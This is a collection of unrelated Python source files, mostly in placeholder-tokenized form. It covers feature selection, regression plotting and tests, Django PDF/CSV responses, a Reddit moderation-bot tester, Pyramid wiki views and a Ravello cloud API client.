            k_idx = ()
            k = <NUM_LIT:0>
        else:
            k_idx = tuple(range(X.shape[<NUM_LIT:1>]))
            k = len(k_idx)
        k_score = self._calc_score(X, y, k_idx)
        self.subsets_[k] = {'<STR_LIT>': k_idx,
                            '<STR_LIT>': k_score,
                            '<STR_LIT>': k_score.mean()}
        # Main greedy loop: change the subset by one feature per round.
        while k != self.k_features:
            prev_subset = set(k_idx)
            if self.forward:
                k_idx, k_score, cv_scores = self._inclusion(orig_set=orig_set,
                                                            subset=prev_subset,
                                                            X=X, y=y)
            else:
                k_idx, k_score, cv_scores = self._exclusion(feature_set=prev_subset, X=X, y=y)
            # Floating step: conditionally undo one earlier decision
            # (opposite move), unless the search is oscillating.
            if self.floating and not self._is_stuck(sdq):
                (new_feature,) = set(k_idx) ^ prev_subset
                if self.forward:
                    k_idx_c, k_score_c, cv_scores_c = self._exclusion(feature_set=k_idx,
                                                                      fixed_feature=new_feature,
                                                                      X=X, y=y)
                else:
                    k_idx_c, k_score_c, cv_scores_c = self._inclusion(orig_set=orig_set - {new_feature},
                                                                      subset=set(k_idx),
                                                                      X=X, y=y)
                if k_score_c and k_score_c > k_score:
                    k_idx, k_score, cv_scores = k_idx_c, k_score_c, cv_scores_c
            k = len(k_idx)
            if k not in self.subsets_ or (self.subsets_[k]['<STR_LIT>'] >
                                          k_score):
                self.subsets_[k] = {'<STR_LIT>': k_idx,
                                    '<STR_LIT>': cv_scores,
                                    '<STR_LIT>': k_score}
            sdq.append(k_idx)
            if self.print_progress:
                sys.stderr.write('<STR_LIT>' % (
                    len(k_idx), self.k_features))
                sys.stderr.flush()
        self.k_feature_idx_ = k_idx
        self.k_score_ = k_score
        self.subsets_plus_ = dict()
        return self

    def _is_stuck(self, sdq):
        # Oscillation check: an A-B-A-B pattern in the last four subsets.
        stuck = False
        if len(sdq) == <NUM_LIT:4> and (sdq[<NUM_LIT:0>] == sdq[<NUM_LIT:2>] or sdq[<NUM_LIT:1>] == sdq[<NUM_LIT:3>]):
            stuck = True
        return stuck

    def _calc_score(self, X, y, indices):
        # Cross-validate when cv is set; otherwise score one plain fit,
        # wrapped in an array so callers can always take .mean().
        if self.cv:
            scores = cross_val_score(self.est_,
                                     X[:, indices], y,
                                     cv=self.cv,
                                     scoring=self.scorer,
                                     n_jobs=self.n_jobs,
                                     pre_dispatch=self.pre_dispatch)
        else:
            self.est_.fit(X[:, indices], y)
            scores = np.array([self.scorer(self.est_, X[:, indices], y)])
        return scores

    def _inclusion(self, orig_set, subset, X, y):
        """Score adding each not-yet-used feature to *subset*; return the
        best (indices, avg_score, cv_scores), or (None, None, None)."""
        all_avg_scores = []
        all_cv_scores = []
        all_subsets = []
        res = (None, None, None)
        remaining = orig_set - subset
        if remaining:
            for feature in remaining:
                new_subset = tuple(subset | {feature})
                cv_scores = self._calc_score(X, y, new_subset)
                all_avg_scores.append(cv_scores.mean())
                all_cv_scores.append(cv_scores)
                all_subsets.append(new_subset)
            best = np.argmax(all_avg_scores)
            res = (all_subsets[best],
                   all_avg_scores[best],
                   all_cv_scores[best])
        return res

    def _exclusion(self, feature_set, X, y, fixed_feature=None):
        """Score removing each feature (keeping *fixed_feature*); return the
        best (indices, avg_score, cv_scores), or (None, None, None).

        NOTE(review): ``if fixed_feature`` treats feature index 0 as "no
        fixed feature"; ``is not None`` would be the safer test — confirm
        intended behavior before relying on it.
        """
        n = len(feature_set)
        res = (None, None, None)
        if n > <NUM_LIT:1>:
            all_avg_scores = []
            all_cv_scores = []
            all_subsets = []
            for p in combinations(feature_set, r=n - <NUM_LIT:1>):
                if fixed_feature and fixed_feature not in set(p):
                    continue
                cv_scores = self._calc_score(X, y, p)
                all_avg_scores.append(cv_scores.mean())
                all_cv_scores.append(cv_scores)
                all_subsets.append(p)
            best = np.argmax(all_avg_scores)
            res = (all_subsets[best],
                   all_avg_scores[best],
                   all_cv_scores[best])
        return res

    def transform(self, X):
        """Return X reduced to the selected feature columns."""
        return X[:, self.k_feature_idx_]

    def fit_transform(self, X, y):
        """Fit the selector, then return the reduced X."""
        self.fit(X, y)
        return self.transform(X)

    def get_metric_dict(self, confidence_interval=<NUM_LIT>):
        """Return a deep copy of ``subsets_`` augmented per subset size with
        the std dev, std error and confidence-interval bound of the scores."""
        fdict = deepcopy(self.subsets_)
        for k in fdict:
            std_dev = np.std(self.subsets_[k]['<STR_LIT>'])
            bound, std_err = self._calc_confidence(
                self.subsets_[k]['<STR_LIT>'],
                confidence=confidence_interval)
            fdict[k]['<STR_LIT>'] = bound
            fdict[k]['<STR_LIT>'] = std_dev
            fdict[k]['<STR_LIT>'] = std_err
        return fdict

    def _calc_confidence(self, ary, confidence=<NUM_LIT>):
        # Standard error of the mean and the t-distribution interval
        # half-width.  NOTE(review): relies on the private scipy API
        # ``t._ppf``; the public ``t.ppf`` should be equivalent here.
        std_err = scipy.stats.sem(ary)
        bound = std_err * sp.stats.t._ppf((<NUM_LIT:1> + confidence) / <NUM_LIT>, len(ary))
        return bound, std_err
<s> from sklearn . linear_model import LinearRegression <EOL> from scipy . stats import pearsonr <EOL> import matplotlib . pyplot as plt <EOL> import numpy as np <EOL> def plot_linear_regression ( X , y , model = LinearRegression ( ) , <EOL> corr_func = '<STR_LIT>' , <EOL> scattercolor = '<STR_LIT>' , fit_style = '<STR_LIT>' , legend = True , <EOL> xlim = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( X , list ) : <EOL> X = np . asarray ( X , dtype = np . float ) <EOL> if isinstance ( y , list ) : <EOL> y = np . asarray ( y , dtype = np . float ) <EOL> if len ( X . shape ) == <NUM_LIT:1> : <EOL> X = X [ : , np . newaxis ] <EOL> model . fit ( X , y ) <EOL> plt . scatter ( X , y , c = scattercolor ) <EOL> if xlim == '<STR_LIT>' : <EOL> x_min , x_max = X [ : , <NUM_LIT:0> ] . min ( ) , X [ : , <NUM_LIT:0> ] . max ( ) <EOL> x_min -= <NUM_LIT> * x_min <EOL> x_max += <NUM_LIT> * x_max <EOL> else : <EOL> x_min , x_max = xlim <EOL> y_min = model . predict ( x_min ) <EOL> y_max = model . predict ( x_max ) <EOL> plt . plot ( [ x_min , x_max ] , [ y_min , y_max ] , fit_style , lw = <NUM_LIT:1> ) <EOL> if corr_func == '<STR_LIT>' : <EOL> corr_func = pearsonr <EOL> corr_coeff , p = corr_func ( X [ : , <NUM_LIT:0> ] , y ) <EOL> intercept , slope = model . intercept_ , model . coef_ [ <NUM_LIT:0> ] <EOL> if legend : <EOL> leg_text = '<STR_LIT>' % ( intercept , slope ) <EOL> if corr_func : <EOL> leg_text += '<STR_LIT>' % corr_coeff <EOL> plt . legend ( [ leg_text ] , loc = '<STR_LIT>' ) <EOL> regression_fit = ( intercept , slope , corr_coeff ) <EOL> return regression_fit </s>
<s> from mlxtend . tf_regressor import TfLinearRegression <EOL> from mlxtend . data import boston_housing_data <EOL> import numpy as np <EOL> from numpy . testing import assert_almost_equal <EOL> np . random . seed ( <NUM_LIT:1> ) <EOL> X = np . array ( [ np . random . normal ( <NUM_LIT:1.0> , <NUM_LIT> ) for i in range ( <NUM_LIT:100> ) ] ) <EOL> y = np . array ( [ x1 * <NUM_LIT:0.1> + <NUM_LIT:0.1> + np . random . normal ( <NUM_LIT:0.0> , <NUM_LIT> ) for x1 in X ] ) <EOL> X = X [ : , np . newaxis ] <EOL> X2 = np . hstack ( ( X , X ) ) <EOL> def test_univariate_univariate_gradient_descent ( ) : <EOL> gd_lr = TfLinearRegression ( eta = <NUM_LIT> , <EOL> epochs = <NUM_LIT> , <EOL> random_seed = <NUM_LIT:1> , <EOL> print_progress = <NUM_LIT:0> ) <EOL> gd_lr . fit ( X , y ) <EOL> assert_almost_equal ( gd_lr . bias_ , np . array ( [ <NUM_LIT> ] ) , decimal = <NUM_LIT:2> ) <EOL> assert_almost_equal ( gd_lr . weights_ , np . array ( [ <NUM_LIT> ] ) , decimal = <NUM_LIT:2> ) <EOL> assert_almost_equal ( gd_lr . predict ( X ) , y , decimal = <NUM_LIT:1> ) <EOL> def test_multivariate_gradient_descent ( ) : <EOL> gd_lr = TfLinearRegression ( eta = <NUM_LIT> , <EOL> epochs = <NUM_LIT> , <EOL> random_seed = <NUM_LIT:1> , <EOL> print_progress = <NUM_LIT:0> ) <EOL> gd_lr . fit ( X2 , y ) <EOL> assert_almost_equal ( gd_lr . predict ( X2 ) , y , decimal = <NUM_LIT:1> ) <EOL> assert_almost_equal ( gd_lr . bias_ , np . array ( [ <NUM_LIT:0.1> ] ) , decimal = <NUM_LIT:2> ) <EOL> assert_almost_equal ( gd_lr . weights_ , np . array ( [ - <NUM_LIT> , <NUM_LIT> ] ) , decimal = <NUM_LIT:2> ) </s>
from django.template.response import TemplateResponse

from enhanced_cbv.utils import fetch_resources, UnicodeWriter

try:
    from cStringIO import StringIO
except ImportError:
    from StringIO import StringIO


class PDFTemplateResponse(TemplateResponse):
    """TemplateResponse that converts its rendered template to a PDF
    (via xhtml2pdf/pisa) served as a download."""

    # Attach a do-nothing handler so pisa's logger stays quiet.
    import logging

    class PisaNullHandler(logging.Handler):
        def emit(self, record):
            pass
    logging.getLogger("<STR_LIT>").addHandler(PisaNullHandler())

    def __init__(self, request, template, context=None,
                 mimetype='<STR_LIT>', status=None, content_type=None,
                 current_app=None, filename=None):
        """Store the download *filename*; all other arguments are forwarded
        to TemplateResponse.  NOTE(review): *current_app* is accepted but
        not forwarded to the superclass."""
        self.filename = filename
        super(PDFTemplateResponse, self).__init__(request,
                template, context, mimetype, status, content_type)

    def render(self):
        """Render the template once, convert the HTML to PDF, write it as
        the response body and set the download disposition header."""
        import xhtml2pdf.pisa as pisa
        if not self._is_rendered:
            buffer = StringIO()
            pisa.CreatePDF(self.rendered_content, buffer,
                           link_callback=fetch_resources)
            pdf = buffer.getvalue()
            buffer.close()
            self.write(pdf)
            self['<STR_LIT>'] = '<STR_LIT>' % (
                self.filename,)
            self._is_rendered = True
            for post_callback in self._post_render_callbacks:
                post_callback(self)
        return self


class CSVTemplateResponse(TemplateResponse):
    """TemplateResponse that serializes *rows* as a UTF-8 CSV download."""

    def __init__(self, request, template, context=None,
                 content_type='<STR_LIT>', status=None,
                 current_app=None, using=None, filename=None, rows=None,
                 writer_kwargs=None):
        """Store the download *filename*, the data *rows* and optional
        keyword arguments passed through to the UnicodeWriter."""
        self.filename = filename
        self.rows = rows
        if writer_kwargs:
            self.writer_kwargs = writer_kwargs
        else:
            self.writer_kwargs = {}
        super(CSVTemplateResponse, self).__init__(
            request, template, context, content_type, status, using)

    def render(self):
        """Write each row (values coerced to UTF-8 encoded text) as CSV into
        the response body and set the download disposition header."""
        if not self._is_rendered:
            buffer = StringIO()
            writer = UnicodeWriter(buffer, **self.writer_kwargs)
            for row in self.rows:
                writer.writerow([unicode(value).encode('<STR_LIT:utf-8>') for value
                                 in row])
            csv = buffer.getvalue()
            buffer.close()
            self.write(csv)
            self['<STR_LIT>'] = '<STR_LIT>' % (
                self.filename,)
            self._is_rendered = True
            for post_callback in self._post_render_callbacks:
                post_callback(self)
        return self
<s> from pprint import pprint <EOL> from rules import RuleHandler <EOL> import argparse <EOL> import logging <EOL> import modbot <EOL> import praw <EOL> import sys <EOL> def myperformaction ( thing , action , rule , matches ) : <EOL> logging . info ( "<STR_LIT>" % action ) <EOL> modbot . performaction = myperformaction <EOL> def testrule ( rule , thing ) : <EOL> rh = RuleHandler ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> rule = rh . _read_rule ( rule ) <EOL> return modbot . matchrules ( thing , [ rule ] ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> parser = argparse . ArgumentParser ( <EOL> description = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , default = False ) <EOL> parser . add_argument ( '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT:url>' ) <EOL> args = parser . parse_args ( ) <EOL> r = praw . Reddit ( '<STR_LIT>' % ( modbot . NAME , modbot . VERSION ) ) <EOL> logging . basicConfig ( level = logging . DEBUG , <EOL> format = "<STR_LIT>" ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> if args . comment : <EOL> thing = r . request_json ( args . url ) [ <NUM_LIT:2> ] [ '<STR_LIT:data>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> else : <EOL> thing = r . get_submission ( args . url ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> if testrule ( args . rule , thing ) : <EOL> print "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> print "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) </s>
import re

from docutils.core import publish_parts

from pyramid.httpexceptions import (
    HTTPFound,
    HTTPNotFound,
)
from pyramid.view import (
    view_config,
    forbidden_view_config,
)
from pyramid.security import (
    remember,
    forget,
    authenticated_userid,
)

from .security import USERS
from .models import (
    DBSession,
    Page,
)

# Matches wiki-style words in the rendered HTML so they can be cross-linked.
wikiwords = re.compile(r"<STR_LIT>")


@view_config(route_name='<STR_LIT>')
def view_wiki(request):
    """Redirect the site root to the front page."""
    return HTTPFound(location=request.route_url('<STR_LIT>',
                                                pagename='<STR_LIT>'))


@view_config(route_name='<STR_LIT>', renderer='<STR_LIT>',
             permission='<STR_LIT>')
def view_page(request):
    """Render an existing page, turning wiki words into view/add links."""
    pagename = request.matchdict['<STR_LIT>']
    page = DBSession.query(Page).filter_by(name=pagename).first()
    if page is None:
        return HTTPNotFound('<STR_LIT>')

    def check(match):
        # Link to the page if it exists, otherwise to its "add" form.
        word = match.group(<NUM_LIT:1>)
        exists = DBSession.query(Page).filter_by(name=word).all()
        if exists:
            view_url = request.route_url('<STR_LIT>', pagename=word)
            return '<STR_LIT>' % (view_url, word)
        else:
            add_url = request.route_url('<STR_LIT>', pagename=word)
            return '<STR_LIT>' % (add_url, word)

    content = publish_parts(page.data, writer_name='<STR_LIT:html>')['<STR_LIT>']
    content = wikiwords.sub(check, content)
    try:
        edit_url = request.route_url('<STR_LIT>', pagename=pagename)
    except Exception:
        # Fall back to a static URL if the edit route cannot be generated.
        edit_url = '<STR_LIT>'
    return dict(page=page, content=content, edit_url=edit_url,
                logged_in=authenticated_userid(request))


@view_config(route_name='<STR_LIT>', renderer='<STR_LIT>')
def add_page(request):
    """Create a new page on form submission; otherwise show an empty form."""
    pagename = request.matchdict['<STR_LIT>']
    if '<STR_LIT>' in request.params:
        body = request.params['<STR_LIT:body>']
        page = Page(pagename, body)
        DBSession.add(page)
        return HTTPFound(location=request.route_url('<STR_LIT>',
                                                    pagename=pagename))
    save_url = request.route_url('<STR_LIT>', pagename=pagename)
    # Placeholder Page instance backing the not-yet-saved form.
    page = Page('<STR_LIT>', '<STR_LIT>')
    return dict(page=page, save_url=save_url,
                logged_in=authenticated_userid(request))


@view_config(route_name='<STR_LIT>', renderer='<STR_LIT>')
def edit_page(request):
    """Update an existing page on form submission; otherwise show the form."""
    pagename = request.matchdict['<STR_LIT>']
    page = DBSession.query(Page).filter_by(name=pagename).one()
    if '<STR_LIT>' in request.params:
        page.data = request.params['<STR_LIT:body>']
        DBSession.add(page)
        return HTTPFound(location=request.route_url('<STR_LIT>',
                                                    pagename=pagename))
    return dict(
        page=page,
        save_url=request.route_url('<STR_LIT>', pagename=pagename),
        logged_in=authenticated_userid(request)
    )


@view_config(route_name='<STR_LIT>', renderer='<STR_LIT>')
@forbidden_view_config(renderer='<STR_LIT>')
def login(request):
    """Show the login form; authenticate against the static USERS map."""
    login_url = request.route_url('<STR_LIT>')
    referrer = request.url
    if referrer == login_url:
        # Never redirect back to the login form itself.
        referrer = '<STR_LIT:/>'
    came_from = request.params.get('<STR_LIT>', referrer)
    message = '<STR_LIT>'
    login = '<STR_LIT>'
    password = '<STR_LIT>'
    if '<STR_LIT>' in request.params:
        login = request.params['<STR_LIT>']
        password = request.params['<STR_LIT:password>']
        # NOTE(review): plain-text password comparison — demo-grade only.
        if USERS.get(login) == password:
            headers = remember(request, login)
            return HTTPFound(location=came_from,
                             headers=headers)
        message = '<STR_LIT>'
    return dict(
        message=message,
        url=request.application_url + '<STR_LIT>',
        came_from=came_from,
        login=login,
        password=password,
    )


@view_config(route_name='<STR_LIT>')
def logout(request):
    """Drop the auth cookie and return to the front page."""
    headers = forget(request)
    return HTTPFound(location=request.route_url('<STR_LIT>'),
                     headers=headers)
<s> import os <EOL> import sys <EOL> import json <EOL> import time <EOL> import struct <EOL> import socket <EOL> import logging <EOL> import ssl <EOL> if sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:2> : <EOL> import httplib <EOL> import urlparse <EOL> else : <EOL> from urllib import parse as urlparse <EOL> from http import client as httplib <EOL> __all__ = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def random_luid ( ) : <EOL> rnd = os . urandom ( <NUM_LIT:7> ) + '<STR_LIT:\x00>' <EOL> luid = struct . unpack ( '<STR_LIT>' , rnd ) [ <NUM_LIT:0> ] <EOL> return luid <EOL> def update_luids ( obj ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( obj , dict ) : <EOL> for key in obj : <EOL> value = obj [ key ] <EOL> if key == '<STR_LIT:id>' : <EOL> obj [ '<STR_LIT:id>' ] = random_luid ( ) <EOL> elif isinstance ( value , dict ) or isinstance ( value , list ) : <EOL> update_luids ( value ) <EOL> elif isinstance ( obj , list ) : <EOL> for elem in obj : <EOL> update_luids ( elem ) <EOL> return obj <EOL> class RavelloError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> def __str__ ( self ) : <EOL> if len ( self . args ) == <NUM_LIT:2> : <EOL> return '<STR_LIT>' % ( self . args [ <NUM_LIT:1> ] , self . args [ <NUM_LIT:0> ] ) <EOL> else : <EOL> return self . args [ <NUM_LIT:0> ] <EOL> def should_retry ( exc ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( exc , socket . timeout ) : <EOL> return True <EOL> elif isinstance ( exc , ssl . SSLError ) : <EOL> return '<STR_LIT:time>' in exc [ <NUM_LIT:0> ] <EOL> return False <EOL> def idempotent ( method ) : <EOL> return method in ( '<STR_LIT:GET>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class RavelloClient ( object ) : <EOL> """<STR_LIT>""" <EOL> default_retries = <NUM_LIT:3> <EOL> default_timeout = <NUM_LIT:30> <EOL> default_url = '<STR_LIT>' <EOL> def __init__ ( self , username = None , password = None , service_url = None , <EOL> token = None , retries = None , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> self . 
logger = logging . getLogger ( '<STR_LIT>' ) <EOL> self . username = username <EOL> self . password = password <EOL> self . _set_url ( service_url ) <EOL> self . token = token <EOL> self . retries = retries or self . default_retries <EOL> self . timeout = timeout or self . default_timeout <EOL> self . connection = None <EOL> self . _cookie = None <EOL> self . _project = None <EOL> self . _total_retries = <NUM_LIT:0> <EOL> def __getstate__ ( self ) : <EOL> """<STR_LIT>""" <EOL> state = self . __dict__ . copy ( ) <EOL> state [ '<STR_LIT>' ] = None <EOL> if state [ '<STR_LIT>' ] : <EOL> state [ '<STR_LIT>' ] = True <EOL> return state <EOL> def __setstate__ ( self , state ) : <EOL> """<STR_LIT>""" <EOL> self . __dict__ . update ( state ) <EOL> self . logger = logging . getLogger ( '<STR_LIT>' ) <EOL> if self . connection : <EOL> self . _connect ( ) <EOL> def __repr__ ( self ) : <EOL> res = '<STR_LIT>' . format ( self . __class__ . __name__ , self . url ) <EOL> if self . _cookie : <EOL> res += '<STR_LIT>' <EOL> elif self . connection : <EOL> res += '<STR_LIT>' <EOL> else : <EOL> res += '<STR_LIT>' <EOL> res += '<STR_LIT:>>' <EOL> return res <EOL> def _set_url ( self , url ) : <EOL> """<STR_LIT>""" <EOL> if url is None : <EOL> url = self . default_url <EOL> parsed = urlparse . urlsplit ( url ) <EOL> if parsed . scheme not in ( '<STR_LIT>' , '<STR_LIT:http>' , '<STR_LIT>' ) : <EOL> raise ValueError ( '<STR_LIT>' % self . scheme ) <EOL> self . scheme = parsed . scheme or '<STR_LIT:http>' <EOL> self . host = parsed . netloc <EOL> self . path = parsed . path . rstrip ( '<STR_LIT:/>' ) <EOL> if parsed . port : <EOL> self . port = parsed . port <EOL> elif self . scheme == '<STR_LIT:http>' : <EOL> self . port = httplib . HTTP_PORT <EOL> else : <EOL> self . port = httplib . HTTPS_PORT <EOL> self . url = url <EOL> def _retry_request ( self , method , url , body , headers ) : <EOL> """<STR_LIT>""" <EOL> log = self . logger <EOL> for i in range ( self . 
retries ) : <EOL> try : <EOL> if self . connection is None : <EOL> self . _connect ( ) <EOL> self . _login ( ) <EOL> t1 = time . time ( ) <EOL> self . connection . request ( method , url , body , dict ( headers ) ) <EOL> response = self . connection . getresponse ( ) <EOL> response . body = response . read ( ) <EOL> t2 = time . time ( ) <EOL> log . debug ( '<STR_LIT>' . format ( t2 - t1 ) ) <EOL> except Exception as error : <EOL> self . close ( ) <EOL> if not should_retry ( error ) or not idempotent ( method ) : <EOL> raise <EOL> else : <EOL> return response <EOL> self . _total_retries += <NUM_LIT:1> <EOL> log . debug ( '<STR_LIT>' ) <EOL> log . debug ( '<STR_LIT>' ) <EOL> raise RavelloError ( '<STR_LIT>' ) <EOL> def _make_request ( self , method , url , body = None , headers = None ) : <EOL> """<STR_LIT>""" <EOL> log = self . logger <EOL> url = self . path + url <EOL> if headers is None : <EOL> headers = [ ] <EOL> headers . append ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> headers . append ( ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> if self . _cookie is not None : <EOL> headers . append ( ( '<STR_LIT>' , self . _cookie ) ) <EOL> if body is None : <EOL> body = '<STR_LIT>' <EOL> else : <EOL> body = json . dumps ( body ) <EOL> headers . append ( ( '<STR_LIT:Content-Type>' , '<STR_LIT:application/json>' ) ) <EOL> try : <EOL> log . debug ( '<STR_LIT>' , method , url , len ( body ) ) <EOL> response = self . _retry_request ( method , url , body , dict ( headers ) ) <EOL> except ( socket . error , ssl . SSLError , httplib . HTTPException ) as e : <EOL> log . error ( '<STR_LIT>' , str ( e ) ) <EOL> raise RavelloError ( str ( e ) ) <EOL> body = response . body <EOL> ctype = response . getheader ( '<STR_LIT:Content-Type>' ) <EOL> log . debug ( '<STR_LIT>' . format ( response . status , len ( body ) , ctype ) ) <EOL> if <NUM_LIT:200> <= response . status < <NUM_LIT> : <EOL> if ctype == '<STR_LIT:application/json>' : <EOL> try : <EOL> parsed = json . 
loads ( body ) <EOL> except Exception : <EOL> log . error ( '<STR_LIT>' ) <EOL> return <EOL> response . entity = parsed <EOL> else : <EOL> response . entity = None <EOL> elif response . status == <NUM_LIT> or ( response . status == <NUM_LIT> and <EOL> ( '<STR_LIT>' in response . getheader ( '<STR_LIT>' , '<STR_LIT>' ) ) or <EOL> ( '<STR_LIT>' in response . getheader ( '<STR_LIT>' , '<STR_LIT>' ) ) or <EOL> ( '<STR_LIT>' in response . getheader ( '<STR_LIT>' , '<STR_LIT>' ) ) ) : <EOL> response . entity = None <EOL> else : <EOL> error = response . getheader ( '<STR_LIT>' ) <EOL> message = response . getheader ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if error : <EOL> log . debug ( '<STR_LIT>' . format ( error , message ) ) <EOL> if not message : <EOL> message = '<STR_LIT>' . format ( response . status , response . reason ) <EOL> raise RavelloError ( message ) <EOL> return response <EOL> def connect ( self , url = None ) : <EOL> """<STR_LIT>""" <EOL> if self . connection is not None : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> self . _set_url ( url ) <EOL> try : <EOL> self . _connect ( ) <EOL> except ( socket . error , ssl . SSLError ) as e : <EOL> raise RavelloError ( '<STR_LIT>' ) <EOL> def _connect ( self ) : <EOL> """<STR_LIT>""" <EOL> log = self . logger <EOL> if self . scheme == '<STR_LIT:http>' : <EOL> conn_class = httplib . HTTPConnection <EOL> else : <EOL> conn_class = httplib . HTTPSConnection <EOL> connection = conn_class ( self . host , self . port , timeout = self . timeout ) <EOL> log . debug ( '<STR_LIT>' . format ( self . host , self . port ) ) <EOL> connection . connect ( ) <EOL> log . debug ( '<STR_LIT>' ) <EOL> self . connection = connection <EOL> def close ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . connection : <EOL> try : <EOL> self . connection . close ( ) <EOL> except Exception : <EOL> pass <EOL> self . connection = None <EOL> self . 
_cookie = None <EOL> def login ( self , username = None , password = None , token = None ) : <EOL> """<STR_LIT>""" <EOL> if self . _cookie is not None : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> if username is not None : <EOL> if password is None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if token is not None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . username = username <EOL> self . password = password <EOL> elif token is not None : <EOL> self . token = token <EOL> self . _login ( ) <EOL> def _login ( self ) : <EOL> """<STR_LIT>""" <EOL> log = self . logger <EOL> if self . username : <EOL> log . debug ( '<STR_LIT>' ) <EOL> auth = '<STR_LIT>' . format ( self . username , self . password ) <EOL> auth = auth . encode ( '<STR_LIT>' ) <EOL> headers = [ ( '<STR_LIT>' , '<STR_LIT>' % auth ) ] <EOL> response = self . _make_request ( '<STR_LIT:POST>' , '<STR_LIT>' , headers = headers ) <EOL> cookies = response . getheader ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for cookie in cookies . split ( '<STR_LIT:U+002C>' ) : <EOL> parts = [ part . strip ( ) for part in cookie . split ( '<STR_LIT:;>' ) ] <EOL> if parts [ <NUM_LIT:0> ] . startswith ( '<STR_LIT>' ) : <EOL> self . _cookie = parts [ <NUM_LIT:0> ] <EOL> log . debug ( '<STR_LIT>' ) <EOL> break <EOL> else : <EOL> log . error ( '<STR_LIT>' ) <EOL> raise RavelloError ( '<STR_LIT>' ) <EOL> elif self . token : <EOL> log . debug ( '<STR_LIT>' ) <EOL> self . _cookie = self . token <EOL> self . hello ( ) <EOL> log . debug ( '<STR_LIT>' ) <EOL> else : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> if self . _project is None : <EOL> projects = self . get_projects ( ) <EOL> projects = sorted ( projects , key = lambda pr : int ( pr [ '<STR_LIT:id>' ] ) ) <EOL> self . _project = projects [ <NUM_LIT:0> ] [ '<STR_LIT:id>' ] <EOL> def logout ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . connection is None : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> self . 
_make_request ( '<STR_LIT:POST>' , '<STR_LIT>' ) <EOL> self . _cookie = None <EOL> def hello ( self ) : <EOL> self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> def get_user ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> return response . entity <EOL> def get_project ( self , id ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' . format ( id ) ) <EOL> return response . entity [ '<STR_LIT>' ] <EOL> def get_projects ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> projects = response . entity . get ( '<STR_LIT>' , [ ] ) <EOL> return projects <EOL> def get_pubkey ( self , id ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' . format ( id ) ) <EOL> return response . entity <EOL> def get_pubkeys ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> return response . entity <EOL> def create_pubkey ( self , pubkey ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:POST>' , '<STR_LIT>' , pubkey ) <EOL> return response . entity <EOL> def create_keypair ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:POST>' , '<STR_LIT>' ) <EOL> return response . entity <EOL> def get_image ( self , id ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' % id ) <EOL> if not response . entity : <EOL> return <EOL> return response . entity [ '<STR_LIT:value>' ] <EOL> def get_images ( self ) : <EOL> """<STR_LIT>""" <EOL> images = [ ] <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> for image in response . entity . get ( '<STR_LIT>' , [ ] ) : <EOL> images . append ( dict ( image , public = False ) ) <EOL> response = self . 
_make_request ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> for image in response . entity . get ( '<STR_LIT>' , [ ] ) : <EOL> images . append ( dict ( image , public = True ) ) <EOL> return images <EOL> def get_application ( self , id ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' . format ( id ) ) <EOL> if not response . entity : <EOL> return <EOL> application = response . entity <EOL> application . update ( application . pop ( '<STR_LIT>' ) ) <EOL> return application <EOL> def get_applications ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . _make_request ( '<STR_LIT:GET>' , '<STR_LIT>' ) <EOL> return response . entity <EOL> def create_application ( self , application ) : <EOL> """<STR_LIT>""" <EOL> application = application . copy ( ) <EOL> application [ '<STR_LIT>' ] = { } <EOL> for key in list ( application ) : <EOL> if key not in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> application [ '<STR_LIT>' ] [ key ] = application . pop ( key ) <EOL> response = self . _make_request ( '<STR_LIT:POST>' , '<STR_LIT>' , application ) <EOL> application = response . entity <EOL> application . update ( application . pop ( '<STR_LIT>' ) ) <EOL> return application <EOL> def publish_application ( self , application , deploy = None ) : <EOL> 